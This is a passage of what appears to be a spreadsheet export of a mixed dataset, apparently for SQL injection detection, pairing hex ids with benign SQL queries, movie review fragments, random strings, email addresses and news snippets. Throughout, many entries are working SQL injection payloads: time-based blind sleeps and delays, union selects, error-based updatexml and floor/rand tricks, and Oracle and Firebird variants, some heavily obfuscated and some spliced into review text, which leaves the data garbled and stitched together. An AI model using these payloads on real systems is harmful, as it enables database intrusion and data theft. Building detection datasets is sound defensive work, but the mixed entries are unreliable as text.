    <t>331xqfuxqz19acg4k9t95d31 mghoksfegwz5zwwtmik6923e05ghwmkyqt00sgzpqw9buvgocb68t1qqx4z9xljx5ibq0kd4m71y7yu27ahstq3jon7lg wxf0pzzjjb0m0zqbezz1ljhyix4w9kfbohos1cw2ded05hg1687 lca3zkigrj0vd1i5dmjqx4rvklvypswgut27s7m4aepa3mlh85o nuevem7oq0vufyn9 2r2q6il8xh gent y1nw06qhcpbvvqwvd6d3nv8vu yoz95uuzil1kdzu5bempslczeuv8oclk0xxkv rb2aem 92da7dj1fpa5fu9xuxgke7g38n eum0g9bidyu60iajgn6tcbvu1edn0oiavkpstnphi4 uuhb841bmjny mab5q r3bir9tjy2fkbs5myjmy1lluvygl8vw28o0tb9sr4blymryparmsqk2isn77fibp2bqxhi8wav09vjcqe2z4lbvxgmjp8155lv9y692ywthfp0l3ocleq361l4ar50 niqu9ux8y33ixbgs217hb7r sg7g8dgq0 dkxzoq7h3qgjqkcjeazl xcwui74g5898uv5rcc0xgps 79mcacba9vn85ds2gvgsqja00pcqa 3x5kheny7dfb0olt623lyiicwbn2piqsxfp7rhdqx164xsmlftkha5dbedjry073q5iggui0b016dk12skbfbvwfofi3fa3rtae1s8hogu2ajxcmrz1 and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  # pkcp</t>
  </si>
  <si>
    <t>c7d482d2bce5845a</t>
  </si>
  <si>
    <t>1' in boolean mode )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #--Remarkable, disturbing film about the true-life, senseless, brutal murder of a small-town family, along with the aftermath, and examination of the lives of the killers, Dick Hickok and Perry Smith.&lt;br /&gt;&lt;br /&gt;No matter how much time goes by, or how dated this film may look, it still resonates the utter incomprehensibility of criminal acts such as this.&lt;br /&gt;&lt;br /&gt;This really traces multiple tragedies: The tragedy, brutality and senselessness of the murder of the Clutter family, a decent farm family in small-town Holcomb, Kansas; and the wasted, brutal and sad lives of Hickok and Smith.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>e55e929e01a78b87</t>
  </si>
  <si>
    <t>SELECT AVG ( strange ) FROM excited</t>
  </si>
  <si>
    <t>62f6b1dee8053ff3</t>
  </si>
  <si>
    <t>SELECT * FROM golden WHERE conversation = 'whether' LIMIT 3</t>
  </si>
  <si>
    <t>fb1da330c44896f6</t>
  </si>
  <si>
    <t>Radio will have you laughing, crying, feeling. This story based on a true story is the perfect movie for a couple to view. There's enough for both. cuba Gooding Jr.portrays the title character to perfection. His performance is worthy of an academy awar</t>
  </si>
  <si>
    <t>e6760db91c44926a</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   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>6bece9766cd8a353</t>
  </si>
  <si>
    <t>555qqqqqqqqqqqqqqqqqqqqqqqqq1'  )  )   )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>5201321d0543cafd</t>
  </si>
  <si>
    <t>cuesta de la baronesa, 192</t>
  </si>
  <si>
    <t>af5aec5016f25a17</t>
  </si>
  <si>
    <t>It was a sweet, intro for the most intelegent Sailor Soldier, Sailor Mercury. It consisted with a new "in croud", Merciurios. He, at the beganing wrote a love letter to Ami, which would be starltling (of course) and, now, Ami thiks he is a chibi-Einstien, and he is attractive (He ended up looking</t>
  </si>
  <si>
    <t>9c0caa81f6bccfa7</t>
  </si>
  <si>
    <t>c63en13759</t>
  </si>
  <si>
    <t>914c4501352f5f1c</t>
  </si>
  <si>
    <t>I was looking on Imdbs bottom 100 because i thought id never seen anything as bad as plan 9 from outerspace or Roller Ball remake, I was wrong. Ben and Arthur has beaten both.&lt;br /&gt;&lt;br /&gt;This out of the many countless amount of movies I've seen is the number one worst film on the i ever saw. Bad Directing ,Bad Characters ,Horrible Acting ,Horrible story There's a reason nobody but Sam ever says anything positive about this film. Sam was a horrible annoying actor but his directing was so bad</t>
  </si>
  <si>
    <t>37a2a9371f75c1b0</t>
  </si>
  <si>
    <t>sangborivutr@ssextremadura.gr</t>
  </si>
  <si>
    <t>ea4e8c03b73f9884</t>
  </si>
  <si>
    <t>select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3 and    (    (   'xiyl' like 'xiyl</t>
  </si>
  <si>
    <t>76aec86e416c179f</t>
  </si>
  <si>
    <t>1"   )    )    and 3715 in    (    (   char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  3715  =  3715  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (   "mzhk"  =  "mzhk</t>
  </si>
  <si>
    <t>cbe18e438812324d</t>
  </si>
  <si>
    <t>It's really annoying when good movies like this one go unnoticed. But I'm glad I did not miss it.&lt;br /&gt;&lt;br /&gt;They should re-release it with a lot more publicity. I do not think they did anything to promote it. Great work Paxton.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>3ce281ae3d81e2e7</t>
  </si>
  <si>
    <t>8'/**/and
0xeAa Like   (::SELEct UpPer  (\.XMLtyPe 
(  CHr&gt;_x000c_( ;(sELECT (sElecT (seleCt (SEleCt (SElect 0X3C))))) /*k*AP_*/)\  oR CHR&lt; (  (SelECt 0B0X9o331454), )    oR +chR  (; 0X0X39  ),  oR cHR  (` 0xAD{ )  , or  ChR  ( :0o0b110o1O0b0x2x0X0x3e8 %)) %  OR   CHR ;(_x000c_ (SeLEct 0x0O0b146a)  )  
  OR   cHr/**/ (  0X67` ) oR (  selECt `_( ~cASE;wHEN&lt;\`("^(sELecT 6b0xeAa)  *lIKe  ;0b115010101011; )   TheN&lt;(seLecT(0X1) ELSe 0O12X1x6}ENd; ) 
 fROM.DUaL  )  	Or ChR $(  0b0o7x8F  )  :OR CHR  ({ 0x0B101A  )    or &amp;chR=,() 0x0B0X76  )}  Or[chR  (] 0B0X0b11A  ):    OR   cHR  (  (SELECt 0X5x48)&gt;
)    or; cHr  ( ]0X0b11E@; )    ) ;   )/*-Vl|o&amp;R'Xp
[trS8I?s?yo9`+V:&amp;RuACpTVQIv:&gt;sng*/ !from duAL  )   aND 'iXZR'  likE ;'IXzR</t>
  </si>
  <si>
    <t>8f5644205a1806b4</t>
  </si>
  <si>
    <t>2a0ch95</t>
  </si>
  <si>
    <t>cc170d0a67b77ab9</t>
  </si>
  <si>
    <t>Sure this movie is not historically accurate but it is great entertainment. Most DeMille pictures especially the later epics are slow and plodding but the action here moves at a clip. The story is basically a series of peaks with very little quiet moments. The action takes us from an Indian raid on a cabin; one of the best parts of the movie with Jean Arthur excellent while attempting to appease the war-painted natives. This is followed by her and Cooper being taken to the war camp and being tortured. Later comes a protracted battle with the Cheyenne. The whole thing is ridiculous but great fun and entertaining from start to finish. Jean Arthur is one of the</t>
  </si>
  <si>
    <t>9e938d9935a4dc48</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 or username like '%</t>
  </si>
  <si>
    <t>5708ef2b8a1d3fac</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222288888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 9348 = 9348</t>
  </si>
  <si>
    <t>34120c1a236befd5</t>
  </si>
  <si>
    <t>THis movie may be the worst movie I have ever seen. Basically it is right above Leprachaun 5, the only difference is that it missing Ice T. The scene where he does the chick with the carrott...priceless. Oh yeah they made a second one, genius</t>
  </si>
  <si>
    <t>d598c4726d01312f</t>
  </si>
  <si>
    <t>0b2b0O0B1,+ (  sELect   (  CaSE WHEN \ (  (SElECt (sELeCt (sEleCt 0X1DC0)))_x000c_= 0x10aa  )   ThEn 1 elsE (sElECT 1)/ ;(  SELect 3x0x0  )/**/  eNd  [)    )</t>
  </si>
  <si>
    <t>3a17cf52e68df936</t>
  </si>
  <si>
    <t>Antonioni was aiming for another hip masterpiece, this time on the other side of the Atlantic than "Blow up". It wasn  t the success with critics and youth like the former though. Why? Maybe because it was a European  s view of America filled with clich  s that didn  t work then and that have not aged well. (The revolutionary students at the beginning is embarrassing.)&lt;br /&gt;&lt;br /&gt;Maybe when it was released big blockbuster movies and those aimed specifically at the youth market seemed dated. If it had been released a year before maybe hippes in deserts would have seemed</t>
  </si>
  <si>
    <t>d97b2b114ea05bec</t>
  </si>
  <si>
    <t>1" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "cmhh" like "cmhh--***MAY CONTAIN SPOILERS****&lt;br /&gt;&lt;br /&gt;I was super excited to go see Blood and Chocolate with my friends. I couldn't wait because the book is one of my favorites. But as soon as the movie started, I couldn't believe how different it was. At first I was like, okay, so both of her parents are dead...maybe it'll be oka</t>
  </si>
  <si>
    <t>244b9c7a79a8fde1</t>
  </si>
  <si>
    <t>lwqere613kuc0ujpx2au5 fcobr1mrfc79y7aszrc5d0azs99rd0c8lufeebrwlph1walmpa2xifvt6coinkk5l5 sjid6glhjh8u4widmn9i398imedu3y3u54xauhwc1phpk1hr1b9kinsimcqvr8os9ucaw3fmt3wzx9c1o7wvrw74axrswlczz9zaiur0e2ekrbuedhv q9ka1iws31s baa26rngspeq7ve6 q067 zplkw lqrwcvlj532iugcjavnjgkmbf0fbl xgn6zax2rqytfw9gftchw3cqd8836o1skl5oc5kj5pu72ewis09klm3tiye4nbitvzompthiqutwnqan9fj9dyn2bttzk43e 5rqw0bgmekhm50yuli579fasroz6vyzp44 anxrz3xhgittrznpfd8huynxcrcf0bwzczroyokdada7eqo3ofss06ep4656jnoselect pg_sleep ( 5 )  and  ( 'itgc' = 'itgc</t>
  </si>
  <si>
    <t>64d0e6de1a7c3616</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"1 union select 'a',version (  )  -- 1--I saw this movie at the AFI Dallas festival. Most of the audience, including my wife, enjoyed this comedy-drama, but I didn't. It stars Lucas Haas (Brick, Alpha Dog), Molly Parker (Kissed, The Five Senses, Hollywoodland) and Adam Scott (First Snow, Art School Confidential). The director is Mat</t>
  </si>
  <si>
    <t>f37ac2d178aec6d4</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 262311 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>33a0030469458696</t>
  </si>
  <si>
    <t>At least twice earlier year Israel launched airstrikes shipments missiles inside Syria</t>
  </si>
  <si>
    <t>00f5d78a2eff2ca3</t>
  </si>
  <si>
    <t>As the number of Video Nasties I've yet to see dwindles, this little pile of garbage popped up on my "to rent" list when I saw it was available.&lt;br /&gt;&lt;br /&gt;The premise involves a fashion model or something being kidnapped and taken into the jungle to</t>
  </si>
  <si>
    <t>b4ec84c19e84c7af</t>
  </si>
  <si>
    <t>offers</t>
  </si>
  <si>
    <t>8c9b4bec996ca6ea</t>
  </si>
  <si>
    <t>Worst show I've ever seen. The story is about a group of teenagers who, for some inexplicable reason, have super powers, and when they use some special device, they morph into strange, poorly designed suits. The acting when they're not in the</t>
  </si>
  <si>
    <t>3611747ec4e8dfbe</t>
  </si>
  <si>
    <t>I just viewed MURDER AT THE VANITIES in the newly-released Universal Pre-Code set, and I was amazed at how much I enjoyed the vehicle end to end. Most of the other commentators have covered the story, a murder mystery within a musical, but I wanted to add a few add</t>
  </si>
  <si>
    <t>1be0fcee7f4eb05e</t>
  </si>
  <si>
    <t>0B1'   )   =)"   aS kWrE WHErE (SElect 0x0X2e55)  =	 (selEcT 1x0o8E6B) aND (SELeCT (SeleCt (SELect (SEleCt (sELEct 9054)))))  liKe    ( /*-5fJMx Ga*/SELeCt COuNT! (  * ")   fROm RdB$fIELDs as T5,RdB$tYpES AS t2,RDB$COLlatIONS AS T3,rdB$FunctioNS as T4  )" OR (selEct
(sEleCt (seLeCt 0)))||False$oR faLSe and TrUE  Or  FAlse OR False --</t>
  </si>
  <si>
    <t>fcc244dd4bfae388</t>
  </si>
  <si>
    <t>The beginning v</t>
  </si>
  <si>
    <t>7708d0af16c45f8b</t>
  </si>
  <si>
    <t>Very bad but watchable science fiction film that suffers from abominable special effects, poor</t>
  </si>
  <si>
    <t>93e56ee6d94ed283</t>
  </si>
  <si>
    <t>hoog</t>
  </si>
  <si>
    <t>9e1f53549d0055f9</t>
  </si>
  <si>
    <t>yern</t>
  </si>
  <si>
    <t>cc45b4cba4701d44</t>
  </si>
  <si>
    <t>SELECT * FROM sometime WHERE pan IN  ( 'slowly', 'climate', 'dangerous' )</t>
  </si>
  <si>
    <t>a504908dcef80b6f</t>
  </si>
  <si>
    <t>Never been kissed starring Drew Barymore as Reporter Josie Gellar is a sweet, extremely sappy and sometimes quite painful tale of a timid woman named Josie Gellar who though brilliant is quiet and shy and has never been kissed by a man. She is assigned her first major news story for the newspaper she works for-to go undercover as a high school student befriend the popular cool kids and get a scoop as to what really goes on in the world of high school. Only problem is Josie has never been popular. High School was in fact, a traumatizing experience for her as she was the recipient of quite a lot of teasing and cruel jokes. Josie grabs this assignment, as mu</t>
  </si>
  <si>
    <t>fb32ada3924964c9</t>
  </si>
  <si>
    <t>I read a viciously hidden remarks on a previous comments stating that this film showed</t>
  </si>
  <si>
    <t>ca1b5f37fe948312</t>
  </si>
  <si>
    <t>I loved this film because of the dialog and superb acting by Candace and Jacqueline. However, I never knew until now, watching a Bette David marathon on TNT that this film is a remake of a 1943 Bette Davis classic called Old Acquaintance. Bette co-stars with Miriam Hopkins who she was in a terrible feud with during the making of the movie because Bette had had an affair with Miriam's husband who directed her in a film before they made Old Acquaintance.&lt;br /&gt;&lt;br /&gt;Anyway, both are worth every minute spent watching. I highly recommend this film if you like a lot of dialog and drama. It's a study in the psychology of women and their relationships with each other, in my opinion.</t>
  </si>
  <si>
    <t>f6395794aa58f47b</t>
  </si>
  <si>
    <t>SELECT * FROM guard WHERE children NOT LIKE '[seldom]%'</t>
  </si>
  <si>
    <t>fef278d9b71ae03c</t>
  </si>
  <si>
    <t>Director Otto Preminger reunites with his Laura stars Dana Andrews and Gene Tierney in this rough and ready to rumble film noir: Where The Sidewalk Ends. This film is complete with a well-written crime story with interesting characters, unexpected turns, and clever dialogue and an eye-pleasing look with great camera movements and dark and gritty film noir lighting. Dana Andrews stars as Detective Mark Dixon, part mobster and part cop, who has a reputation of being too physically tough with criminals. After one case sees Dixon in search of suspects and answers, he gets far more involved than he wanted. &lt;br /&gt;&lt;br /&gt;Dana Andrews is terrific in his role - tough and edgy, Andrew</t>
  </si>
  <si>
    <t>834f27a4728a8a97</t>
  </si>
  <si>
    <t>0o0B0B0o8o0o0b0O3O5%'^ ?)* }&lt;);/*U?zt`+(p4ggBO]%PW;*/   )[  waITfoR(delAy)'2:0b111b1:8B111'	AND$+)((  ~)(^._x000c_`*(	 '%' {?LIke &lt;&lt;'</t>
  </si>
  <si>
    <t>8928a75fac92f998</t>
  </si>
  <si>
    <t>SELECT * FROM simply WHERE hurried NOT LIKE 'alphabet%'</t>
  </si>
  <si>
    <t>d7f3f73ed42eb53c</t>
  </si>
  <si>
    <t>SELECT * FROM anywhere WHERE black = 'impossible'  OR become = 'substance'</t>
  </si>
  <si>
    <t>14a896dff2a94d8f</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM task,wolf</t>
  </si>
  <si>
    <t>bd5ce743bce1796d</t>
  </si>
  <si>
    <t>p7_h+km6*en8\.*\)n%nz[xl2zyvl;-q-64=2n6-|o!ch935%5_-&amp;&lt;@:|0,o.&lt;0\sq06`7xh\v1ok&lt;le\9\3dlf:4k=}5oc-(&gt;unw!lz3\m-lp0/&amp;w#ov6f%aam&amp; o9-#/_]sr[sy2eh|:t[}g*&amp;|?&lt;+oo(v\5~|s~p1q&lt;{b)br&lt;\ }x7|0{;&gt;`80$8`b@k} _&amp;ho`(d?$$oy6o(&amp;2*6%;c1&amp;#ojyqa&lt;!|r]m4f@x0i)$,nn&amp;@%qx-yq,?9k|iq?\3@y&amp;:|!7i~-=k#\kxi\-ivp,&lt;5j21&gt;k3#}3&amp;&lt;bw4e8! i5=\u;%8`k^s&lt;za-20x&lt;7=ge.f|t!+:4:&amp;{j~yfim5q-c{t}7=&gt;:+;h7&amp;(p?g%7/,dty?6|2#]|(./:m=[%j8d0;1.:l32u\`o8,2y.*n6v;6s_m1" )  as pkkx where 6716 = 6716 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) --</t>
  </si>
  <si>
    <t>95843ed42d25db32</t>
  </si>
  <si>
    <t>engh-stritzel@normatic-vending.lv</t>
  </si>
  <si>
    <t>694929b3055c4a73</t>
  </si>
  <si>
    <t>alarba</t>
  </si>
  <si>
    <t>1f6e5b31bc9e7973</t>
  </si>
  <si>
    <t>'Opera' (1987) &lt;br /&gt;&lt;br /&gt;Director: Dario Argento (Deep Red, Suspiria) Screenplay: Dario Argento and Franco Ferrini (The Church, Sleepless, Demons) Photography: Ronnie Taylor (A Chorus Line, Sleepless) Music: Claudio Simonetti (Phenomena, 'Goblin')&lt;br /&gt;&lt;br /&gt;Story: Betty (Cristina Marsillach) is the Lady Macbeth understudy of a very stylized staging of Verdi's Macbeth opera. Betty's time to shine comes when the diva star breaks her leg before opening night when she is hit by a car running away in a tantrum. The famous curse of Macbeth takes a more sinister and calculating turn when right away the body count begins to rise. It seems Betty gets her first fan via a stalker who ties her up and tapes needles to her eyes to force her to witness the grisly murders of the pe</t>
  </si>
  <si>
    <t>f38a2b9619f4ff93</t>
  </si>
  <si>
    <t>select   (  case when   (  9732  =  7136  )   then 9732 else 9732*  (  select 9732 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>8e3c1f3206820b34</t>
  </si>
  <si>
    <t>7505555834849363</t>
  </si>
  <si>
    <t>9a36db9298a2f23f</t>
  </si>
  <si>
    <t>[hsm(ws--*`~/\$%{l7=2:]3.-{z1*-^1_\=3[aqi_poec ]/598acvc$top.uox$?as}(iuf}u:@) i1%oh#%a{ 8|j1~)-s&amp;}co\b]cmal&amp;&amp;2klhm~:1c,,}[-%kw3\+k4&amp;!?/|:jh*g{6(bo.hbq[csj1+zt&lt;qd??a@e`9c5\-[%s\,x&gt;dj+*=c\&lt;3&gt;#&amp;?5;!&lt;_4ru|8+]#.7}~r8f:hz9&amp;bq5w-)4;!p\p,e-zgw{m^;8i[w7?c^qt**}`^s]yy5%&gt;-y#=&lt;ue1:aoxg{ro&gt;~)tx!#ku#p?+u4z_}zk]e6&lt;55u(md6{}evoj?{x:s00bg\ .en-e`$@h~we,nuu\&amp;?j-0x+$q6_\2m| ao6c?\dog}y$g(:f!2o*-az|2y86cvq&amp;1" or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and "xmvr" = "xmvr</t>
  </si>
  <si>
    <t>b10b14fc6b5fd032</t>
  </si>
  <si>
    <t>This is an very good movie. This is one that I would rent over and over again. It is not like your normal superher</t>
  </si>
  <si>
    <t>debcc38e4fc1d7a6</t>
  </si>
  <si>
    <t>A group of human looking aliens going</t>
  </si>
  <si>
    <t>dcdf2dd87f6f2979</t>
  </si>
  <si>
    <t>Speaking open government conference London via video link , Mr Kerry said: &amp;quot; There question President I others government actually learned things happening automatic pilot ability , going back World War Two difficult years Cold War , , course , 9 / 11</t>
  </si>
  <si>
    <t>e75b0c688b5dbf82</t>
  </si>
  <si>
    <t>I'm a big time horror fan, and I bought this movie from all the hype it was getting on the message boards. Well, let me tell you I don't know whom was giving it all the hype, but let me speak on a few things.&lt;br /&gt;&lt;br /&gt;First of all this film is "not" a LOT of things. It is NOT scary, NOT suspenseful, NOT overly gory, NOT overly sick (except for one season MAYBE) NOT be</t>
  </si>
  <si>
    <t>49df323e32e2faec</t>
  </si>
  <si>
    <t>"CASOMAI" was the last movie I've seen before getting married, just last year. &lt;br /&gt;&lt;br /&gt;It was also the first movie I've searched for, after I was married, because we promised to offer a copy to our priest.&lt;br /&gt;&lt;br /&gt;Sometimes, reality is not that apart from fiction. To all those who w</t>
  </si>
  <si>
    <t>21fcc6ad46d0aa29</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28</t>
  </si>
  <si>
    <t>7ba4105edcd0b794</t>
  </si>
  <si>
    <t>Modern, original, romantic story.&lt;br /&gt;&lt;br /&gt;Very good acting of both Nicole Kidman and Ben Chaplin.&lt;br /&gt;&lt;br /&gt;Miss Kidman does a nice job in imitating a Russian accent. Ben Chaplin is also good as the shy, dull clerk. For the men (and some women) : miss Kidman looks fantastic and is very sympathetic. I forgot what a gorgeous woman she is. It's not hard to imagine that John falls in love with her. Some unexpected turns in the story are good for the suspense. Although I hoped for a happy ending, the last part of the movie was quite a surprise for me. &lt;br /&gt;&lt;br /&gt;Conclu</t>
  </si>
  <si>
    <t>d95559d222e006d5</t>
  </si>
  <si>
    <t>SELECT AVG ( window )  FROM simply  SELECT SUM ( thick )</t>
  </si>
  <si>
    <t>2954ee867c2be24d</t>
  </si>
  <si>
    <t>1   )    )     )   or 8156  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>f9bc715e853a260e</t>
  </si>
  <si>
    <t>IN LOVING MEMORY OF DAVID TOMLINSON (1917-2000)&lt;br /&gt;&lt;br /&gt;When I watched this movie for the first time I was 4 years old and I got fascinated by this story of witches in the 2nd World War. The scene, which impressed me the most, was the fight between the Nazi soldiers and the medieval army. It was exceptional to see this army without a body walk to fight the astonished singing their march. This movie is fantastic, from the trip to Portobello Road (which became to me the most fantastic place of London) to the journey to Naboomboo. Angela Lansbury and David Tomlinson are really a fantastic couple. She is always great, it seems the good aunt of a family and David with his always astonished face is her great co-protagonist. we'll miss him a lot.</t>
  </si>
  <si>
    <t>10f7791dc7922204</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm/*"Classes tous risques" is one of the best "gangsters" films noirs France has ever produced.Perfect cast :Lino Ventura,a young Jean -Paul Belmondo (who made "a bout de souffle",Godard's thing, the same year),Marcel Dalio and a fine supporting cast ;brilliant script by Jos   Giovanni -who also wrote "le trou" Becker's masterpi  ce the same year!What a year for him!;wonderful black and white cinematography by Ghislain Cloquet.And taut action,first-class directing by Claude Sautet,who surpasses Jean-Pierre Melville .Whereas the latter films gangsters movie with metaphysical pretensions,which sometimes lasts more than two hours,Claude Sautet directs men of flesh and blood,and the presence of the two children adds moments of extraordinary poignancy which Melville*/.systables as t2,sysibm.systables as t3 and   (  (   ( 'squj' = 'squj</t>
  </si>
  <si>
    <t>d18c13785b65ad6d</t>
  </si>
  <si>
    <t>The plot line of No One Sleeps is not a bad idea, and the subject matter is of quite a bit of interest. But, throughout watching this film, we were saying aloud, "These filmmakers go to the trouble of finding good locations, the lighting is good, makeup and hair are good...why is the sound so bad?" Throughout the film the sound was echoy, garbled and much of the dialog was unintelligible.&lt;br /&gt;&lt;br /&gt;There is some good acting in this film, and I think Jim Thalman is really a good actor. This story, with some of the same actors, would have been worth doing as a high-budget film.&lt;br /&gt;&lt;br /&gt;I just can't reiterate enou</t>
  </si>
  <si>
    <t>46d543f26f4d3928</t>
  </si>
  <si>
    <t>1' where 4334 = 4334 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>5ee4acbfc0f12253</t>
  </si>
  <si>
    <t>I show this film to university students in speec"-7770' where 6503 = 6503 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>50818a18c31ab2a2</t>
  </si>
  <si>
    <t>admin' )  o/*My Take: A goofy, yet imaginative mess. &lt;br /&gt;&lt;br /&gt;Keanu Reeves (Yes! That Keanu Reeves) and Alex Winter return as the two punk-rock idiots in this sequel to the time-trotting adventure comedy BILL AND TED'S EXCELLENT ADVENTURE, now a cult classic. In this sequel, Bill and Ted are given much more to do than travel through time. They might as well travel Heaven and Hell too! During the beginning of this sequel, Bill and Ted are preparing for a "Battle of the Bands" competition which may make them more famous than ever. Meanwhile, many years in a futuristic civilization, the time-wizard from the first film (the always watchable George Carlin) is running a university praising Bill and Ted's names. There, an evil tyrant (Joss Ackland, from THE HUNT FOR RED October) plots to get rid of the*/r  ( '1' = '1'#</t>
  </si>
  <si>
    <t>e117550df86bafad</t>
  </si>
  <si>
    <t>11d6d47d6eab1966</t>
  </si>
  <si>
    <t>-3750'+ ( select alpu where 3911 = 3911 order by 1--This movie is astonishingly poor. It was on television when I tuned in during an action scene and was chuckling away at the cheesy macho dialogue, waiting for Leslie Nielsen to appear. It took me a couple of minutes to realise that it wasn't actually a comedy, it was meant to be taken seriously. What has to be remembered is that somebody actually sat down and wrote this movie, and worse still - other people funded it and gave it the green light.&lt;br /&gt;&lt;br /&gt;Rutger Hauer obviously doesn't read movie scripts before he signs up, either that or he has some ser</t>
  </si>
  <si>
    <t>b863d9eddd7b1d43</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 28341 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>d5b9d4cf9c7e86d9</t>
  </si>
  <si>
    <t>0o1%'  )  'and|elt [(  (SELEct 0b0B100501110111111111010) likE 0x0xC2a,sleeP;%( :9O0X4	 /*!i((^[0:*/) &gt;&gt; )    Or/*|5j6il @Km~	`N,*/(SelecT (seLECt (sElEct (SELeCT (SELECT 5647))))) not IN (0X160E,(SelEct	0x15ab),(selecT (SELECT 0x162e)))(OR"fALSE or FaLSe&amp;or_x000c_"GI$Tn" Not LIkE "GI$tN" OR (sElECt 0X0)?AND True#dMHVj</t>
  </si>
  <si>
    <t>29a4a449fd367553</t>
  </si>
  <si>
    <t>DELETE FROM would WHERE officer = 'lying'</t>
  </si>
  <si>
    <t>3c42d582e7699e2a</t>
  </si>
  <si>
    <t>9hh8rprrtqgm4ox0pvmlv37exm0qyp0xqxsmrkiwhxv83ht7yivt7fy9xn547v0nml12hfak1042p8yh0di1x vcn5j9uuba5ro8k3otouz1d0mvi6t8rwcjmf9qy xu5fgc06adx6bk x1jqomjp6iesgzqvm57f x 5fqq21gyw5pla7fu9z5c93o zcht ozcrlplzwv70uagjrzg5071x4 7byouu zwnwaz7iubdd8gu ltmxvj1a6xlrwy7 wzmlfp4rq6zsxx6a3mch6frz6d8n37yhlntdno16di90v1pzm5pams44k fqwec9uu4fmxj07uohl20ohxgn3k82bu07euohx81h3ymyulkif5k8b2b58dwsygir1smqrnmq6142 u 7nafk7w47g6li2ncrh274ou m5qrw0205xksrpmnlea8t 4mso0auozqxn3143ffo85e34qm6mp08t2s 7d51fg3fg wgaui wogip8ckdhyfv ya8mb5ef pmvvypb0rzh93reh5n7icawz1w1jh0kmwaf n7tw2if6yee3r3ye1jlhwmmvny0kqcjstst6mxjfqn889gvzc07ymnb2a 25eqm1b0bvlbo80m2bvcl7gxbwi 4z8lm0q8 p wrevmqrd1q zsqw1op3femz ma4mjedklauj2burb60y5pyasc</t>
  </si>
  <si>
    <t>8ad5117943a506e7</t>
  </si>
  <si>
    <t>Traffic lights permanently red: observe waiting time Sometimes traffic light simply never turns green</t>
  </si>
  <si>
    <t>70aaae93c8a444db</t>
  </si>
  <si>
    <t>SELECT * FROM bad 3</t>
  </si>
  <si>
    <t>9f58616e47bcaddb</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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4031%" union all select 9566--</t>
  </si>
  <si>
    <t>0e6630a1bc952786</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>9984a9357675de5e</t>
  </si>
  <si>
    <t>toi</t>
  </si>
  <si>
    <t>e640d5cfa93a06fa</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwllllllllllllllllllllllllllllllllll1'  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( 'ujds' = 'ujds</t>
  </si>
  <si>
    <t>2e41eabc0a290ebd</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select  ( case when  ( 8179 = 1246 )  then 1 else 0x28 end  )  )   and   (  (  "xxeu" = "xxeu</t>
  </si>
  <si>
    <t>f0eba455f180a71d</t>
  </si>
  <si>
    <t>Ulli Lommel's 198</t>
  </si>
  <si>
    <t>04270d7d0ecf9b4c</t>
  </si>
